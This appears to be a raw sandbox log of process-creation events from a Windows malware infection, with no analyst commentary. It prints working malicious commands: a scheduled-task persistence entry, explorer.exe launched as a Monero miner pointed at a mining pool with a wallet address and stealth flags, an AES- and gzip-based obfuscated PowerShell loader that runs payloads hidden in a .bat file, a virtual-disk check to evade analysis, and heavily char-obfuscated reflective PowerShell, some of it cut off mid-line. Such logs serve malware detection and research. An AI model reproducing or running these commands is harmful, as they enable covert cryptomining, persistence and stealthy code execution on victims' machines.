        Source: C:\Users\user\AppData\Local\Temp\paint.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[